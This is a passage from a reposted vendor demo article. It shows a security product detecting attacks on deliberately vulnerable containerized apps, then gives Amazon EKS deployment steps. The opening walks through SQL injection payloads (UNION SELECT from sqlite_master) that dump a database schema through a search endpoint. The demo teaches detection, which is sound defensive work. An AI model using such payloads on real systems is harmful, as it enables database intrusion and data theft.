start=\"2\">\n<li><u>Exfiltrating the entire database schema definition<\/u><\/li>\n<\/ol>\n<p>The URI <span class=\"rte-red-text\">\/rest\/products\/search?q=<\/span> is susceptible to SQL Injection attacks because it generates some unhandled verbose errors when putting &#8216;; in the query parameter.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image26.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol>\n<li>Craft the attack payload&nbsp;UNION SELECT&nbsp; by merging the data from the&nbsp;sqlite_master&nbsp;table into the products returned in the JSON result.<\/li>\n<li>As a starting point, we use the known working&nbsp;&#8216;))&#8211;&nbsp;attack pattern and try to generate&nbsp;UNION SELECT&nbsp;<\/li>\n<li>Searching for&nbsp;&#8216;)) UNION SELECT * FROM x&#8211;&nbsp;fails with a&nbsp;SQLITE_ERROR: no such table: x&nbsp;\u2014as expected<\/li>\n<li>Searching for&nbsp;&#8216;)) UNION SELECT * FROM sqlite_master&#8211;&nbsp;fails with a promising&nbsp;SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number of result columns&nbsp;which at least confirms the table name.<\/li>\n<li>The next step in a&nbsp;UNION SELECT-attack is typically to find the right number of returned columns. As the&nbsp;<i>Search Results<\/i>&nbsp;table in the UI has three columns displaying data, it will probably be at least three. You keep adding columns until there is no&nbsp;SQLITE_ERROR (or at least it becomes a different one):\n<ol type=\"a\">\n<li>&#8216;)) UNION SELECT &#8216;1&#8217; FROM sqlite_master&#8211; Fails with number of result columns error<\/li>\n<li>&#8216;)) UNION SELECT &#8216;1&#8217;, &#8216;2&#8217; FROM sqlite_master&#8211; Fails with number of result columns error<\/li>\n<li>&#8216;)) UNION SELECT &#8216;1&#8217;, &#8216;2&#8217;, &#8216;3&#8217; FROM sqlite_master&#8211; Fails with number of result columns error<\/li>\n<li>(&#8230;)<\/li>\n<li>&#8216;)) UNION SELECT &#8216;1&#8217;, &#8216;2&#8217;, &#8216;3&#8217;, &#8216;4&#8217;, &#8216;5&#8217;, &#8216;6&#8217;, &#8216;7&#8217;, &#8216;8&#8217; FROM sqlite_master&#8211; Still fails with number of result columns error<\/li>\n<li>&#8216;)) UNION SELECT &#8216;1&#8217;, &#8216;2&#8217;, &#8216;3&#8217;, &#8216;4&#8217;, &#8216;5&#8217;, &#8216;6&#8217;, &#8216;7&#8217;, &#8216;8&#8217;, &#8216;9&#8217; FROM sqlite_master&#8211; Ta-da! You receibe a JSON response back with an extra element {&#8220;id&#8221;:&#8221;1&#8243;,&#8221;name&#8221;:&#8221;2&#8243;,&#8221;description&#8221;:&#8221;3&#8243;,&#8221;price&#8221;:&#8221;4&#8243;,&#8221;deluxePrice&#8221;:&#8221;5&#8243;,&#8221;image&#8221;:&#8221;6&#8243;,&#8221;createdAt&#8221;:&#8221;7&#8243;,&#8221;updatedAt&#8221;:&#8221;8&#8243;,&#8221;deletedAt&#8221;:&#8221;9&#8243;}.<\/li>\n<\/ol>\n<\/li>\n<li>Eliminate the unwanted product results by changing the query to&nbsp;qwert&#8217;)) UNION SELECT &#8216;1&#8217;, &#8216;2&#8217;, &#8216;3&#8217;, &#8216;4&#8217;, &#8216;5&#8217;, &#8216;6&#8217;, &#8216;7&#8217;, &#8216;8&#8217;, &#8216;9&#8217; FROM sqlite_master&#8211;&nbsp;leaving only the &#8220;UNIONed&#8221; element in the result set.<\/li>\n<li>Replace one of the fixed values with correct column name&nbsp;sql, which is why searching for&nbsp;qwert&#8217;)) UNION SELECT sql, &#8216;2&#8217;, &#8216;3&#8217;, &#8216;4&#8217;, &#8216;5&#8217;, &#8216;6&#8217;, &#8216;7&#8217;, &#8216;8&#8217;, &#8216;9&#8217; FROM sqlite_master&#8211;&nbsp;should work.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image27.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p><u>Detection<\/u>: <b>YES<\/b><\/p>\n<p><u>Triggers:<\/u><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image28.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p><u>Policy<\/u>: <b>SQL Injection<\/b><\/p>\n<p><b><span class=\"body-subhead-title\">Deploying vulnerable web application using Amazon EKS<\/span><\/b><\/p>\n<p><b>As we demonstrated, Application Security can effectively protect your containerized web application deployed on Amazon ECS from various attacks. Now, we will show you how our solution can protect your applications deployed using Amazon EKS. For this demo, we will be deploying the vulnerable Django application by nVisium in a Kubernetes environment. Below is the architectural overview:<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image29.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"15\">\n<p>Web Application Deployed &#8211; Django.nV (Python application)<\/p>\n<p>AWS Services Used &#8211; EKS, Elastic Load Balancing (ELB), EC2 ,VPC, SG.<\/p>\n<ol readability=\"1\">\n<li>Create an Amazon EKS cluster<\/li>\n<p><b>a. In the Amazon EKS service, create and name the cluster, then click Next Step.<\/b><\/p>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image30.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p><b>&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;b. Select <i>Kubernetes Version<\/i>. If you already have cluster service role, then you should see it in the drop-down menu. If not, go to the AWS IAM console.<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image31.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Click <i>Create Role<\/i> and select <i>EKS<\/i> option, then select <i>EKS &#8211; Cluster<\/i>. Return to the cluster configuration\u2014you should now see the drop-down for cluster service role.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image32.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>c. Specify the network configuration for the cluster. You can create your own VPC, subnets, and SGs or choose existing ones. For <i>Cluster endpoint access<\/i>, choose <i>Public<\/i>.<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image33.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;d. Send all the logs you want to CloudWatch (currently disabled).<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image34.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>e. After clicking <i>Next<\/i>, wait for the cluster to activate, then launch an Amazon EC2 instance or use an existing one in the selected VPC. Set up your AWS CLI and kubectl to manage the cluster.<\/b><\/p>\n<p>To set up AWS CLI:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Install Python on the system<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Install AWS-CLI<br \/>&nbsp; &nbsp; &nbsp; &nbsp;<i>pip install awscli<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Configure AWS CLI with secret key and access key, which can be obtained from AWS Security Token Service (STS) or from the Active Directory Federation Services (ADFS). Use the same user credentials as the cluster.<\/span><\/li>\n<\/ul>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>f. Check if the cluster is ready by using this command:<\/b><\/p>\n<p><i><span class=\"blockquote\">aws eks &#8211;region ap-south-1 describe-cluster &#8211;name PT-cluster &#8211;query cluster.status<\/span><\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image35.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.407608695652\">\n<div readability=\"11.608695652174\">\n<p>This command should show your cluster as <i>ACTIVE<\/i>.<\/p>\n<ol start=\"2\">\n<li>Install and configure kubectl with the Amazon EKS API server<\/li>\n<\/ol>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>a. Visit <a href=\"https:\/\/kubernetes.io\/docs\/tasks\/tools\/install-kubectl-linux\/\" target=\"_blank\" rel=\"noopener\">this link<\/a> for kubectl installation<\/b><br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>b. <i>Update kubeconfig file:<\/i><\/b><\/p>\n<p><i><span class=\"blockquote\">aws eks &#8211;region ap-south-1 update-kubeconfig &#8211;name PT-Cluster<\/span><\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image36.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;c. Validate kubectl with your master node:&nbsp;<\/b><\/p>\n<p><i><span class=\"blockquote\">.\/kubectl get svc<\/span><\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image37.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<ol start=\"2\">\n<li>Create a Node Group<\/li>\n<\/ol>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>a. Go to your cluster and click the <i>Compute<\/i> tab, then click <i>Add Node Group<\/i>.<\/b><br \/><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;b. Name your node group. If you don&#8217;t already have an Amazon EKS worker node policy, visit the AWS IAM console again.<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image38.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;c. Create the following role with the mentioned policy from IAM console. Select the newly created role in the node group configuration and click <i>Next.<\/i><\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image39.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; d. Select your <i>AMI type<\/i>, <i>Capacity type<\/i>, and other configurations based on the use case. Click <i>next<\/i>.<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image40.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>e. Specify subnets, security groups, and SSH key pair for the worker node instance. Click <i>Next<\/i> to review everything.<\/b><br \/><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f. Wait for your node group to be active. You can check this by using the kubectl command from the Amazon EC2 you control the cluster from.<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image41.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.0625\">\n<div readability=\"7.8888888888889\">\n<ol start=\"3\">\n<li>Build the container image for Django.nV web app, configure it to be managed from Application Security, and upload it to Amazon ECR<\/li>\n<\/ol>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;<b>&nbsp;&nbsp;&nbsp;&nbsp;a. Clone the docker project from Github. Click <a href=\"https:\/\/github.com\/aaronweaver\/appsec-pipeline-django.nV\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/b><br \/><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;b. Edit the&nbsp;<i>taskManager\/wsgi.py<\/i> and add<i>&nbsp;import trend_app_protect.start<\/i><\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image42.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><b><i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;c.&nbsp;<\/i>Edit the <i>requirements.txt<\/i> and add&nbsp;<i>trend_app_protect<\/i><\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image43.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;d. Create the&nbsp;<i>trend_app_protect.ini<\/i>&nbsp;file in the root directory of the project and fill in with the key and secret (obtained from the Application Security console after group creation).&nbsp;<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image44.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>Don\u2019t forget to add a <i>[trend_app_protect]<\/i> header at top of the file.<\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>e. The Docker run command needs extra argument to expose 8000 port no. and entrypoint as&nbsp;docker-startup.sh. Configure Dockerfile to incorporate this by default when running the Docker, without any arguments. Edit the DockerFile like this:<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image45.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.125748502994\">\n<div readability=\"16.497005988024\">\n<p><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;g. Build your Docker image using&nbsp;<i>docker build.&nbsp;<\/i>from the project root directory and copy the image ID after it\u2019s completed.<\/b><br \/><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;h. Tag your newly created docker image and upload it to your &nbsp;Amazon ECR repository:<\/b><\/p>\n<p><span class=\"blockquote\"><i>docker tag &lt;image-id&gt; &lt;Account-id&gt;<\/i><a href=\"http:\/\/302645411908.dkr.ecr.ap-south-1.amazonaws.com\/repo_yash:Juice_Shop_Managed\"><i>.dkr.ecr.&lt;region&gt;.amazonaws.com\/&lt;repo_name&gt;:<\/i><\/a><i>&lt;Image_name_you_want_to_give&gt;<\/i><\/span><\/p>\n<p><span class=\"blockquote\"><i>docker push&nbsp;&lt;Account-id&gt;<\/i><a href=\"http:\/\/302645411908.dkr.ecr.ap-south-1.amazonaws.com\/repo_yash:Juice_Shop_Managed\"><i>.dkr.ecr.&lt;region&gt;.amazonaws.com\/&lt;repo_name&gt;:<\/i><\/a><i>&lt;Image_name_you_want_to_give&gt;<\/i><\/span><\/p>\n<p>Check the Amazon ECR repository to view your uploaded image.<\/p>\n<ol start=\"4\">\n<li>Building deployment and load balancing manifest files<\/li>\n<\/ol>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>a. Build your manifest file for deploying the container image uploaded to Amazon ECR:<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image46.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;b. Build you manifest file for load balancing:<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image47.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>c. Deploy both the manifest files to your cluster:<\/b><\/p>\n<p><span class=\"blockquote\"><i>.\/kubectl apply -f DjangonV-deploy.yaml<\/i><\/span><\/p>\n<p><span class=\"blockquote\"><i>.\/kubectl create -f loadbalancer.yaml<\/i><\/span><\/p>\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<b>d. Access your website link from the following command:<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image48.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>If not accessible, recheck the SGs for required port allowance (8000).<\/p>\n<ol start=\"5\">\n<li>Check if the application is properly managed by Application Security<\/li>\n<\/ol>\n<p><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;a. The container app should automatically be managed. Check the Application console for the following:<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/21\/f\/demo-security-for-containerized-applications\/image49.png\" alt=\"Demo Security For Containerized Applications\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.684532924962\">\n<div readability=\"15.906584992343\">\n<p><b><span class=\"body-subhead-title\">Conclusion<\/span><\/b><\/p>\n<p>As seen in the demo, Application Security is effective at detecting and thwarting advanced threats and vulnerabilities that could cause harm to your containerized application. By implementing Application Security, developers and security teams alike gain the peace of mind that vulnerabilities are remediated before deployment. With SecOps teams happy that security is being prioritized, and developers happy that they can build and deploy without security disruptions, the DevOps culture grows stronger<\/p>\n<p>Curious to try it for yourself? Start your <a href=\"https:\/\/cloudone.trendmicro.com\/SignUp.screen\" target=\"_blank\" rel=\"noopener\">free 30-day trial today<\/a>. You can also watch other <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-one-application-security.html\">serverless<\/a> and <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/hybrid-cloud\/cloud-one-application-security.html\" target=\"_blank\" rel=\"noopener\">container<\/a> demos to learn more.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <a id=\"devopsrc-2cb4de\" href=\"https:\/\/cloudone.trendmicro.com\/SignUp.screen\" target=\"_blank\" rel=\"noopener noreferrer\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/trial-banners\/cloud-one-trial-banner.jpg\" alt=\"cloud-one-trial\"> <\/a> <\/figure>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <!-- Go to www.addthis.com\/dashboard to customize your tools --> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/21\/f\/nist-guidelines-for-containerized-application-security.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Learn how to secure containers and protect against breaches. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":42337,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9503,9575,9571,9507],"class_list":["post-42336","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-devops-article","tag-trend-micro-devops-container-security","tag-trend-micro-devops-how-to","tag-trend-micro-devops-multi-cloud"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>NIST Guidelines for Containerized Application Security Threat Researcher 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"NIST Guidelines for Containerized Application Security Threat Researcher 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/nist-guidelines-for-containerized-application-security-threat-researcher\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-24T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/nist-guidelines-for-containerized-application-security-threat-researcher.png\" \/>\n\t<meta property=\"og:image:width\" content=\"824\" \/>\n\t<meta property=\"og:image:height\" content=\"320\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"17 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"NIST Guidelines for Containerized Application Security Threat Researcher\",\"datePublished\":\"2021-06-24T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/\"},\"wordCount\":3280,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/nist-guidelines-for-containerized-application-security-threat-researcher.png\",\"keywords\":[\"Trend Micro DevOps : Article\",\"Trend Micro DevOps : Container Security\",\"Trend Micro DevOps : How To\",\"Trend Micro DevOps : Multi Cloud\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/nist-guidelines-for-containerized-application-security-threat-researcher\\\/\",\"name\":\"NIST Guidelines for Containerized Application Security Threat Researcher 2026 | ThreatsHub Cybersecurity 